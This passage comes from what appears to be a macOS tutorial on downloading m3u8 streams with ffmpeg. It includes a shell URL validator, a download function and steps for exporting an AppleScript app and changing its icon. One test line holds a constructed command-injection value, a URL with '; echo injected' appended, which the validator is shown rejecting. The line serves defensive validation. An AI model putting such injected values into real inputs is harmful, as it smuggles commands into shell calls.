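URL_RE="^https?://[^[:space:]'\"\`<>|]+\.m3u8(\?[^[:space:]'\"\`<>|]*)?\$"

# valid_m3u8_url URL: 0 when URL matches URL_RE
valid_m3u8_url() {
  printf '%s\n' "$1" | grep -Eq "$URL_RE"
}

# output_path FOLDER NAME: join folder and file name with exactly one "/"
# (the AppleScript relies on the POSIX path already ending in "/")
output_path() {
  printf '%s/%s' "${1%/}" "$2"
}

# download_m3u8 URL FOLDER NAME: the post's ffmpeg command with safe argv
download_m3u8() {
  valid_m3u8_url "$1" || { echo "refusing URL: $1" >&2; return 1; }
  target=$(output_path "$2" "$3")
  ffmpeg -i "$1" -c copy -bsf:a aac_adtstoasc "$target"
}

# Constructed inputs: one acceptable URL and one that an unquoted shell
# string would have split into a second command
valid_m3u8_url 'https://cdn.example.com/live/stream.m3u8?token=abc' && echo "accepted"
valid_m3u8_url 'https://cdn.example.com/x.m3u8; echo injected' || echo "rejected"
```

Usage: `download_m3u8 'https://…/stream.m3u8' ~/Movies video.mp4`; the URL check rejects anything that is not a plain http(s) playlist URL before ffmpeg is started.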

Export

Now you can “Save” or “Export” the script as an “app”.

Save/Export AppleScript as app

If you don’t like the icon, you can change it. Download an “.icns” file from a source of your choice. Select the app and hit the “Command + i” keys. Now drag the icon onto the original icon in the info window and close the window. Ready … move it into the Applications folder and use it.